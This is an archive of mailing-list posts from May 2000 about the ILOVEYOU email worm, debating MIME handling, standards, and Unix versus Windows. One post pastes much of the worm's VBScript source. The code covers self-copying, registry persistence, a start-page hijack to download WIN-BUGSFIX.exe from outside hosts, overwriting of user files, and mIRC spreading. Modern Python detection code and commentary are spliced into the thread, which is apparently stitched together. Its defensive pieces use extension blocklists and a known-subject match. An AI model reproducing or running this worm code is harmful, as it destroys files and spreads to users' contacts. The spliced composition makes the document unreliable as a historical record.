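def make_constructed_tree(root):
    """Build a small constructed directory tree with harmless placeholder files."""
    layout = {
        "Windows/System/MSKernel32.vbs": b"placeholder A (constructed)",
        "Documents/backup.vbs": b"placeholder A (constructed)",
        "Documents/report.vbs": b"unrelated script (constructed)",
        "Pictures/cat.jpg.vbs": b"placeholder A (constructed)",
        "Pictures/dog.jpg": b"image bytes (constructed)",
    }
    for relative, content in layout.items():
        path = os.path.join(root, *relative.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as handle:
            handle.write(content)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as demo:
        make_constructed_tree(demo)
        for rule, paths in sweep(demo).items():
            print(rule, [os.path.relpath(p, demo) for p in paths])
```

Name matches only catch the variant described here; the content-clone rule is the part that still works when file names change.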
RE: VIRUS WARNING
From: Lillian Komlossy [EMAIL PROTECTED]

> The whole world will not switch over to Unix - the average user will always be more comfortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they're accustomed to - and one which cannot be ignored.

The issue cannot be ignored, but it has nothing to do with UNIX. The only connection with UNIX is that UNIX comes from the old tradition in which design involved more than increasing already long lists of bullet items that people with no knowledge or interest in computers think they understand, but don't and don't care that they don't.

The issue is that the Internet is not merely a big but private corporate internet such as the one in Redmond. Authentication and authorization are not the same things. That which is most convenient or "user-friendly" is not safe enough, whether it is using ActiveX to update software from AOL/Netscape or Microsoft headquarters without the informed consent of the local user, not requiring the informed local consent before running the latest dancing baby email attachment, or many other things including those that are called viruses but that don't differ significantly.

Vernon Schryver [EMAIL PROTECTED]
RE: VIRUS WARNING
This discussion is as bad as the virus. Can we take it off this list and have it individually please?

Mark A. Lipford

-Original Message-
From: Lillian Komlossy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:02 AM
To: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING

Donald,

The whole world will not switch over to Unix - the average user will always be more comfortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they're accustomed to - and one which cannot be ignored.

Lillian Komlossy
Site Manager
http://www.dmnews.com http://www.imarketingnews.com
(212) 925-7300 ext. 232

-Original Message-
From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:48 AM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING

The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of.

Donald

From: "Scot Mc Pherson" [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Thu, 4 May 2000 09:27:19 -0400

There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it.

-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
RE: THe Value Of Following Standards... (was Re: VIRUS WARNING)
I don't know about deliberate inclusion of the security hole - it looks more to me like "careless". Feels like it just "was not thought to be a danger of any kind to security"... (Does the word TITANIC mean anything to you?)

Lillian Komlossy
Site Manager
http://www.dmnews.com http://www.imarketingnews.com
(212) 925-7300 ext. 232

-Original Message-
From: Keith Moore [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:58 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)

> So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs.

well there's nothing illegal about violating RFCs. but it sure seems like the deliberate inclusion of a security hole in email software would be sufficient grounds for a class action lawsuit.

Keith
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
On Thu, 04 May 2000 10:41:34 EDT, "Michael H. Warfield" said:

> Your mailer may be able to display it as text (mine, Mutt, certainly can) but it is definitely propagating as type application/octet-stream, not text/plain. Wish we could lay that one on them, but we can't.

Mea Culpa - seems *MY* MUA decided to be naughty and flag it as a text/plain, so I reported it as such. I'll shut up now while I go and beat said MUA into submission and make it not lie to me anymore.

Yes, the data as it was actually stored in the message store was an application/octet-stream. However, that's not much better, security-wise. (Although at least with an "application/foobar", you know that it's designed for application foobar, and can appropriately sandbox your foobar-viewer).

--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
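The thread has so far named three things a mail gateway could look at: the subject and attachment name SARC suggested filtering on, the declared MIME type (text/plain versus application/octet-stream), and the file name's real extension. The sketch below is an added example, not code from any poster or vendor; it checks all three on constructed messages and treats the subject match as the weakest signal, since a renamed copy defeats it. The extension sets, reason labels and verdict names are assumptions of this example.

```python
import email
import os
from email import policy
from email.message import EmailMessage

# Extensions Windows will hand to a script host or run directly. Drawn from the
# extension list and file names quoted in this thread; an assumption for the
# example, not a complete blocklist.
EXECUTABLE_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsh", ".sct", ".hta", ".exe"}
# Inner suffixes that make a name look like a document or media file.
DECOY_EXTS = {".txt", ".jpg", ".jpeg", ".mp3", ".mp2", ".doc", ".htm", ".html"}
KNOWN_SUBJECT = "ILOVEYOU"
KNOWN_ATTACHMENT = "love-letter-for-you.txt.vbs"
STRUCTURAL = {"executable-extension", "double-extension",
              "text-type-with-executable-name"}


def check_attachment(filename, content_type):
    """Return the reasons an attachment is suspicious (empty list if none)."""
    # Windows ignores trailing dots and spaces, so "x.vbs." still runs as .vbs.
    name = (filename or "").lower().rstrip(". ")
    stem, ext = os.path.splitext(name)
    inner_ext = os.path.splitext(stem)[1]
    reasons = []
    if ext in EXECUTABLE_EXTS:
        reasons.append("executable-extension")
        if inner_ext in DECOY_EXTS:
            reasons.append("double-extension")
        # A text/* label on something the OS will execute: the label and the
        # handler the client would pick disagree.
        if content_type.startswith("text/"):
            reasons.append("text-type-with-executable-name")
    if name == KNOWN_ATTACHMENT:
        reasons.append("known-attachment-name")
    return reasons


def inspect_message(raw_bytes):
    """Parse a raw message and map each flagged item to its list of reasons."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = {}
    if str(msg["Subject"] or "").strip().upper() == KNOWN_SUBJECT:
        findings["<subject>"] = ["known-subject"]
    # walk() also covers a single-part message that is itself the attachment.
    for part in msg.walk():
        filename = part.get_filename()
        if filename is None:
            continue
        reasons = check_attachment(filename, part.get_content_type())
        if reasons:
            findings[filename] = reasons
    return findings


def verdict(findings):
    """Structural hits quarantine; a subject or name match alone only flags."""
    if any(STRUCTURAL & set(reasons) for reasons in findings.values()):
        return "quarantine"
    return "review" if findings else "deliver"


def build_sample(subject, filename, maintype, subtype):
    """Constructed test message with a harmless placeholder attachment."""
    msg = EmailMessage()
    msg["From"] = "friend@example.org"
    msg["To"] = "user@example.org"
    msg["Subject"] = subject
    msg.set_content("constructed sample body")
    msg.add_attachment(b"constructed placeholder bytes", maintype=maintype,
                       subtype=subtype, filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    samples = [
        ("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs", "application", "octet-stream"),
        ("Fwd: holiday pictures", "beach.jpg.vbs", "text", "plain"),
        ("ILOVEYOU", "poem.txt", "text", "plain"),
    ]
    for sample in samples:
        found = inspect_message(build_sample(*sample))
        print(sample[0], "->", verdict(found), found)
```

The second sample carries neither the known subject nor the known attachment name and is still quarantined, which is the case a subject-line list misses.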
Re: VIRUS WARNING
Date: Thu, 04 May 2000 10:48:12 -0400
From: "Donald E. Eastlake 3rd" [EMAIL PROTECTED]

> The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of.

You need to get with program! Having software which is a good culture medium for e-mail virus is part of the innovative new features which customers are demanding. Clearly, you need report to re-education camps to learn why it's important to let the government let companies have to freedom to innovate wonderful things like vbscript. :-)

- Ted
RE: VIRUS WARNING
From: "Scot Mc Pherson" [EMAIL PROTECTED]

> Actually what happened, was I received this virus from a trusted friend ... I am just glad that I didn't have any e-mail lists in my "address book"

That's actually an interesting bit of "social engineering" on the part of the virus writer - using the address book as a source of places to propagate to means that those people who get it are *exactly* the set of people who know you, and are thus more likely to open a random unexpected attachment...

Noel
RE: VIRUS WARNING
The whole world will use what they are presented with. The difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability that's holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too!

On Thu, 4 May 2000, Lillian Komlossy wrote:

Donald,

The whole world will not switch over to Unix - the average user will always be more comfortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they're accustomed to - and one which cannot be ignored.

Lillian Komlossy
Site Manager
http://www.dmnews.com http://www.imarketingnews.com
(212) 925-7300 ext. 232

-Original Message-
From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:48 AM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING

The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of.

Donald

From: "Scot Mc Pherson" [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Thu, 4 May 2000 09:27:19 -0400

There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it.

-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net

A. James Lewis ([EMAIL PROTECTED])
Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
RE: THe Value Of Following Standards... (was Re: VIRUS WARNING)
This is what happens when a software giant makes up the rules as they go along, all in the name of making the umm user err happy. Now I will spend £30.00 on anti-virus software :-)

-Original Message-
From: Magnus Danielson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 4:24 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)

From: [EMAIL PROTECTED]
Subject: THe Value Of Following Standards... (was Re: VIRUS WARNING)
Date: Thu, 04 May 2000 10:46:33 -0400

On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said:

There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it.

Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs.

I'm not pointing fingers, but ;)

You are missing the point here, this is user friendliness, the user is allowed to do whatever he/she wants, even in others' equipment with others' data. ;) It does make box management so much easier ;)

Cheers,
Magnus
Re: VIRUS WARNING
> Clearly, you need report to re-education camps to learn why it's important to let the government let companies have to freedom to innovate wonderful things like vbscript. :-)

not to mention gratuitous incompatibilities to Kerberos.

Keith
RE: VIRUS WARNING
Office for Unix, Now there's a terrifying thought (please don't contaminate the purity of my unix system with that filthy windows software)

Jim

Jim Dunn
Senior Network Engineer
San Francisco NOC

-Original Message-
From: A James Lewis [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:53 AM
To: Lillian Komlossy
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING

The whole world will use what they are presented with. The difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability that's holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too!

On Thu, 4 May 2000, Lillian Komlossy wrote:

Donald,

The whole world will not switch over to Unix - the average user will always be more comfortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they're accustomed to - and one which cannot be ignored.

Lillian Komlossy
Site Manager
http://www.dmnews.com http://www.imarketingnews.com
(212) 925-7300 ext. 232

-Original Message-
From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:48 AM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING

The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of.

Donald

From: "Scot Mc Pherson" [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Thu, 4 May 2000 09:27:19 -0400

There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it.

-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net

A. James Lewis ([EMAIL PROTECTED])
Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
> the builders of the titanic didn't know that certain kinds of steel become brittle at cold temperatures. otoh, the developers of this user agent knew, or should have known, the risks of executing code of unknown origin. they have been understood for a long time. they were discussed during development of the MIME standard. the MIME specs have required content-types to document known security risks since the early 1990s. other email-borne viruses have used similar mechanisms to this one to propagate themselves.

So if the users would save the virus to disk and then run it, what's the savings? If I send a naked_bunnies.exe file to a dirty joke email list, some people are going to run it no matter what warnings are given or whether or not it's zipped and uuencoded, whatever. If 20% of the people receiving a virus propagate it rather than 50%, that's probably still good enough to be significantly detrimental.

You could have senders sign any executables. That might help a little, as long as the sender's machine hasn't been compromised.

Austin
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
> So if the users would save the virus to disk and then run it, what's the savings?

the virus doesn't propagate as quickly, nor to as many people, before it is detected and countermeasures are put in place. yes, this does make a significant difference.

> You could have senders sign any executables. That might help a little, as long as the sender's machine hasn't been compromised.

this would also help, but we'd need a better way to verify the sender's signature than we have now.

Keith
RE: VIRUS WARNING
Let's not make it political. We've all been attacked, it is pointless to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac are all great as long as somebody likes to work with them. I personally like Microsoft products, but I respect those who don't - and expect the same respect from them.

Lillian Komlossy
Site Manager
http://www.dmnews.com http://www.imarketingnews.com
(212) 925-7300 ext. 232

-Original Message-
From: Jim Stephenson-Dunn [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 4:18 PM
To: 'A James Lewis'; 'Lillian Komlossy'
Cc: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING

Office for Unix, Now there's a terrifying thought (please don't contaminate the purity of my unix system with that filthy windows software)

Jim

Jim Dunn
Senior Network Engineer
San Francisco NOC

-Original Message-
From: A James Lewis [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:53 AM
To: Lillian Komlossy
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING

The whole world will use what they are presented with. The difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability that's holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too!

On Thu, 4 May 2000, Lillian Komlossy wrote:

Donald,

The whole world will not switch over to Unix - the average user will always be more comfortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they're accustomed to - and one which cannot be ignored.

Lillian Komlossy
Site Manager
http://www.dmnews.com http://www.imarketingnews.com
(212) 925-7300 ext. 232

-Original Message-
From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:48 AM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING

The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of.

Donald

From: "Scot Mc Pherson" [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Thu, 4 May 2000 09:27:19 -0400

There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it.

-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net

A. James Lewis ([EMAIL PROTECTED])
Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
Re: VIRUS WARNING
"noone ever got fired for buying ibm" this was ironic coz ibm was expensive, but worked someone should get fired for buying someone elses prodiucts irony no class action just reality checkpoint time... for a systemic view, some stuff is engineered better than other stuff - see mark handly's excellent letter to the new york times, post melissa the best reason for diversity is not anti-capitalist, its darwinian. meanwhile, eres some visaual basic. j. cut here and paste to yor favourite waste disposal=== filename="LOVE-LETTER-FOR-YOU.TXT" rem barok -loveletter(vbe) i hate go to school rem by: spyder / [EMAIL PROTECTED] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem"\MSKernel32.vbs") c.Copy(dirwin"\Win32DLL.vbs") c.Copy(dirsystem"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSK ernel32",dirsystem"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServ ices\Win32DLL",dirwin"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if 
(fileexist(dirsystem"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw65 87345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546 786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOh fgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUg qwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN -BUGSFIX",downread"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec"\"bname".vbs") 
fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eqfolderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on
Re: VIRUS WARNING
On Thu, 04 May 2000 20:39:43 EDT, Keith Moore said:

> but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings.

Not if the UCITA becomes legal. Large immoral software vendors can then ship software shrink-wrapped with a "if you break the seal you agree to the license inside", and the license inside prohibits you from reverse-engineering, publicising, or discussing bugs. I kid you not.

Sometimes I wish the Virginia state constitution was amended so a governor can succeed himself - currently, they're only in for one consecutive term, so they tend to do splashy-but-longterm bad things to use it as a springboard for a Congressional campaign...

At least the guys in Richmond had the sense to put a one-year study period in before it becomes the law...

Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
Re: VIRUS WARNING
On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson [EMAIL PROTECTED] said:

> In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems.

Hmm.. the Morris worm of 1988. What are the other 2?

Hmm.. if you count the 2 self-reproducing sample programs that came with 'gcc', no others.

Or maybe there's more than 3, which is likely since I've seen at least 4 different "proof of concept" level creations...

Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
Re: VIRUS WARNING
> Hmm.. the Morris worm of 1988. What are the other 2?

Piers Dick Lauder and Bob Kummerfeld implemented Mail/sendfile *@* (yes, wildcards both sides of the user@host name form) in ACSnet prior to this. It was designed to be used amongst other things, to do s/w updates to all ACSnet subscribers. And it worked over IP as well as an applications layer over TCP/IP, gated into sendmail.

The one time I saw them use it, it killed my sendmail by n-n*m explosion of outbound mails. And as soon as I deleted one from mqueue, another 20 came in.

Mike Lesk claimed UUCP was invented for similar reasons and I seem to recall some more than proof of concept uux methods to re-create forwarding data but that's probably never been exploited in an IP network.

Then there are the checkgroups message flows in News...

cheers
-George

--
George Michaelson
DSTC Pty Ltd, University of Qld 4072, Australia
Email: [EMAIL PROTECTED]
Phone: +61 7 3365 4310
Fax: +61 7 3365 4311
http://www.dstc.edu.au